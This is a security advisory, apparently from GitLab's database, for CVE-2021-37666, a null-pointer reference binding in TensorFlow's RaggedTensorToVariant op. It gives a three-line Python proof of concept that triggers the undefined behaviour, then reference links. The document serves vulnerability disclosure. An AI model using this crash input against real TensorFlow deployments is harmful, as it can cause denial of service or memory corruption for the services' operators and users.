CVE-2021-37666: Reference binding to nullptr in `RaggedTensorToVariant`
(updated )
An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.RaggedTensorToVariant
:
import tensorflow as tf
tf.raw_ops.RaggedTensorToVariant(
rt_nested_splits=[],
rt_dense_values=[1,2,3],
batched_input=True)
References
- github.com/advisories/GHSA-w4xf-2pqw-5mq7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-579.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-777.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-288.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/be7a4de6adfbd303ce08be4332554dff70362612
- github.com/tensorflow/tensorflow/security/advisories/GHSA-w4xf-2pqw-5mq7
- nvd.nist.gov/vuln/detail/CVE-2021-37666
Detect and mitigate CVE-2021-37666 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →